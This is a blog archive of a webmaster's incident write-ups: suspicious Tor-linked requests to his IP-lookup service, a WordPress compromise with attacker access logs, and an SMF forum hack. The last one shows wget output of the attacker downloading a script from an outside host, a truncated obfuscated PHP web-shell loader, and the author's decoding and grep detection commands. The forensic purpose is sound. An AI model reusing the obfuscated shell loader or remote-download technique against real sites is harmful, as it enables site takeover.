Tag Archives: Hack

Strange TOR Traffic To Get IP

Is this evidence of another TOR and Firefox exploit to get your IP address, or something completely mundane?

I just checked the logs of a service that I provide that returns your IP address -

http://myip.wampdeveloper.com/

It was put up to be used under WampDeveloper Pro (to let the user know the server’s public IP address; usually the router’s IP) so as to not depend on any external services, and for anyone else that wanted to use it for whatever reason (no restrictions).

The logs had a large amount (relatively speaking to WampDeveloper’s use) of requests that started in May, different IPs, all with the same user-agent string (the string that identifies the make and build of the Browser you are using).
 
From doing a “resolveip” (attempts to turn the IP address into a potentially readable host name containing useful information) on some of the IPs, a lot of them are being reported as coming from -

  1. TOR exit nodes and routers
  2. Freedom and Privacy type hosting servers
  3. Some residential/home addresses (not WampDeveloper Pro related, it uses it’s own user-agent string)

 
Google returns no external results for query “myip.wampdeveloper.com”, except for the few times I mentioned it on HackerNews.

If these requests are coming from users of the Tor Bundle, the usage of myip.wampdeveloper.com appears to be under-the-radar, probably being used from within the Browser, like in a JS file that attempts to get your IP address (via a de-anonymized / local request).
 
The reason I say that (under-the-radar), is because the “reported” user-agent string of these requests is Chrome, not Firefox (Browser of the Tor Bundle). But the JS can set whatever user-agent string it wants, and those requests also don’t hit the favicon.ico URL (standard procedure for most browsers on first request to a website) – so it’s definitely not coming from the users going to (or being redirected to) the myip page, but rather coming from a script.
 
This is kind of really strange and unexpected, but hopefully is not related to all this -
Attackers wield Firefox exploit to uncloak anonymous Tor users
Tor security advisory: Old Tor Browser Bundles vulnerable
Torsploit takedown: analysis, reverse engineering, forensic

…But is rather just some other TOR based product/service using myip.wampdeveloper.com as part of a list of URLs it rotates through – a list of whats-my-ip services; or someone using this for their own needs.
 
The benefit of the above myip service is that it returns nothing but the IP, no HTML, no XML, etc. Just a few bytes of data via TCP/IP. Probably all within 1 packet.

Another Day, Another WordPress Hack.

It could have been worse.

A few weeks ago we were hit with an SMF v1.1.3 exploit just a few days after the release of v1.1.4. The intruder inserted a slew of hidden spam links into the main ‘index.php’ file.

It took me a day or two to detect the modifications. And in this short time period forums.devside.net, which has been online since 2003, with a healthy Pagerank, had all it’s pages dropped from Google [with the exception of profiles and archives].

It’s a good thing I keep the forums on their own sub-domain, which Google treats more like a separate domain than anything else. A SE problem with the sub does not affect the main domain.

As a counter-measure to these “exploit app weakness, get shell, d/l script, profit” type of attacks, I have disabled most of the shell related PHP functions on the server.

And so I thought my problems where solved…

This time it’s my fault. I was running WordPress v2.2.2, with v2.2.3 having been released about a month ago. I’ve been checking the WP dashboard, but I must have missed it, or forgotten about it.

This time the intruder exploited one of many WP weaknesses, and inserted some type of a hidden “-1″ post that was nothing more than an attachment to this particular shell-script, executed with URL ‘/blog/?poncheg’…


WordPress Hack 1


WordPress Hack 2

217.118.81.46 - - [08/Oct/2007:07:10:20 -0400] "GET /wp-includes/js/tinymce/wp-mce-help.php HTTP/1.0" 404 520 "-" "-"
217.118.81.46 - - [08/Oct/2007:07:10:25 -0400] "GET / HTTP/1.0" 200 12071 "-" "-"
217.118.81.46 - - [08/Oct/2007:07:10:35 -0400] "GET /blog/wp-includes/js/tinymce/wp-mce-help.php HTTP/1.0" 200 7665 "-" "-"
217.118.81.46 - - [08/Oct/2007:07:11:01 -0400] "POST /blog/xmlrpc.php HTTP/1.0" 200 4327 "-" "Opera"
217.118.81.46 - - [08/Oct/2007:07:11:49 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 200 1647 "http://www.devside.net/blog/wp-admin/options.php" "Opera"
217.118.81.46 - - [08/Oct/2007:07:11:56 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 302 904 "http://www.devside.net/blog/wp-admin/options.php" "Opera"
217.118.81.46 - - [08/Oct/2007:07:11:59 -0400] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 200 1554 "http://www.devside.net/
blog/upload.php?style=inline&tab=upload&post_id=-1" "Opera"
217.118.81.46 - - [08/Oct/2007:07:12:14 -0400] "POST /blog/wp-admin/upload.php?style=inline&tab=upload&post_id=-1 HTTP/1.0" 302 509 "http://www.devside.net/b
log/upload.php?style=inline&tab=upload&post_id=-1" "Opera"
217.118.81.46 - - [08/Oct/2007:07:12:25 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 200 1629 "http://www.devside.net/blog/wp-admin/options.php" "Opera"
217.118.81.46 - - [08/Oct/2007:07:12:30 -0400] "POST /blog/wp-admin/options.php HTTP/1.0" 302 904 "http://www.devside.net/blog/wp-admin/options.php" "Opera"
217.118.81.46 - - [08/Oct/2007:07:12:33 -0400] "GET /blog/wp-admin/upgrade.php?step=1 HTTP/1.0" 200 1446 "-" "-"
...
82.103.135.182 - - [08/Oct/2007:07:12:48 -0400] "GET /blog/?poncheg HTTP/1.0" 200 4789 "-" "Opera/9.22 (Windows NT 5.1; U; ru)"
...
whois 217.118.81.46
JSC "VimpelCom" WLAN1 Moscow

resolveip 82.103.135.182
Host name of 82.103.135.182 is vps206.fastvps.ru

Luckily, in addition to the disabled PHP functions, I also had all my file/dir permissions under WP locked down, so it does not look like anything was modified. I still recreated the entire WP directory, just for safety sakes, and had to manually go into the database and delete the hidden attachment/post.

It’s not a matter of if you are going to get hacked, it’s a matter of when. So keep those web apps patched!

All Your SMF Forums Have Been Hacked. Have a Nice Day.

There is nothing quite like innocently checking over your httpd logs, attempting to figure out why the ‘preview’ feature of your forum s/w has stopped working [stuck on 'fetching preview...'], only to come up to this…

--09:57:23--  http://kotzilla.jino-net.ru/include.txt
           => `include.txt'
Resolving kotzilla.jino-net.ru... 217.107.217.29
Connecting to kotzilla.jino-net.ru|217.107.217.29|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44,348 (43K) [text/plain]

    0K .......... .......... .......... .......... ...       100%   69.60 KB/s

09:57:25 (69.60 KB/s) - `include.txt' saved [44348/44348]

For those that do not know, the above translates to using wget, or the equivalent, to download a script to your system. With all this being done via Apache and usually from a simple URL designed to exploit a weakness in the given application.

My journey starts here.

Step 1.

find / -name include.txt

Nothing. Intruder must have deleted or renamed it.

Step 2.
Check http://kotzilla.jino-net.ru/include.txt for clues.

<?PHP
             //Authentication
$login = ""; //Login
$pass = "";  //Pass
$md5_pass = ""; //If no pass then hash
eval(gzinflate(base64_decode('HJ3HkqN...[removed]...f/79z/8A')));
?>

Intruder must think this is clever. Once you decode and inflate the string, it returns…

eval(gzinflate(base64_decode('[another string to decode and inflate]')));

Step 3.
We do not want to execute any PHP code that is an unknown. The only option left is to write a PHP script to decode/inflate until we get at the center…

<?php
$string = "eval(gzinflate(base64_decode('HJ3HkqN...[removed]...f/79z/8A')));";
$pattern = '/^eval(gzinflate(base64_decode('([^');]*)/';
$count = 0;
while (preg_match($pattern, $string, $matches) )
{
$count++;
$string = gzinflate(base64_decode($matches[1]));
}
echo "Decoded/Inflated:$countn";
echo "$string";
?>

Seems to be some type of a web php shell script called C99madShell.

Step 4.
We need to locate the downloaded script…

find / -name '*.php' | xargs grep 'eval(gzinflate(base64_decode('
/.../forums.devside.net/Themes/readme.php:eval(gzinflate(base64_decode('HJ3Hkq...

Not good!

Hack Shell 1

Hack Shell 2

Step 5.
Check logs.

grep 'readme.php' /.../forums.devside.net/access_log

Intruder was up to something no good.

149.156.204.1 - - [26/Sep/2007:09:57:38 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4374 "-" "Opera/9.21 (Windows NT 5.1; U; ru)"
149.156.204.1 - - [26/Sep/2007:09:58:00 -0400] "POST /Themes/readme.php HTTP/1.1" 200 3501 "http://forums.devside.net/Themes/readme.php" "Opera/9.21 (Windows NT 5.1; U; ru)"
149.156.204.1 - - [27/Sep/2007:13:08:03 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4366 "-" "GoogleBotv2"
149.156.204.1 - - [27/Sep/2007:13:09:24 -0400] "POST /Themes/readme.php HTTP/1.1" 200 4980 "http://forums.devside.net/Themes/readme.php" "GoogleBotv2"
...

Final Analysis.
I’ve search the logs, and I cannot locate anything helpful about the exploit. It does not seem to be an exploit in a URL, maybe POST related, or has something to do with the SMF theme function. I run no mods, and use the default theme, and do not allow users to switch themes.

The latest SMF 1.1.4 changelog does not state anything about fixed exploits.

I know the IP of the intruder [I'm sure just a hijacked system], the user_id on the forum, the mail account used for activation, but not much anything else.

resolveip 149.156.204.1
Host name of 149.156.204.1 is nzs.agh.edu.pl
149.156.204.1 - - [26/Sep/2007:09:52:58 -0400] "GET /index.php?action=activate;u=1992;code=136bd7eb0f HTTP/1.1" 200 3409 "http://www.qcsalabama.com/mail/src/
read_body.php?mailbox=INBOX&passed_id=685&startMessage=1" "Opera/9.21 (Windows NT 5.1; U; ru)"

Checking the forum account, I see this user has also logged in via another IP [and this might be where the exploit starts]…

83.219.135.75 - - [26/Sep/2007:09:48:07 -0400] "GET /index.php?action=register HTTP/1.1" 200 5961 "http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&
q=+%22powered+by+smf+1.1.3%22+site%3Anet&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
...
83.219.135.75 - - [26/Sep/2007:09:57:07 -0400] "POST //index.php?action=login2 HTTP/1.1" 302 851 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:09 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:11 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 1527 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:23 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 307 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
resolveip 83.219.135.75
Host name of 83.219.135.75 is ppp135-75.tis-dialog.ru

I can understand phpBB getting rooted, I can understand WordPress being owned, but this is a first one for SMF.

And for anyone having odd issues with SMF [like getting stuck on 'fetching preview...']…

Smile. All your SMF forums have been hacked. Have a nice day.

Search ‘fetching preview’ on the SMF support forums. This hack/exploit might be going back years.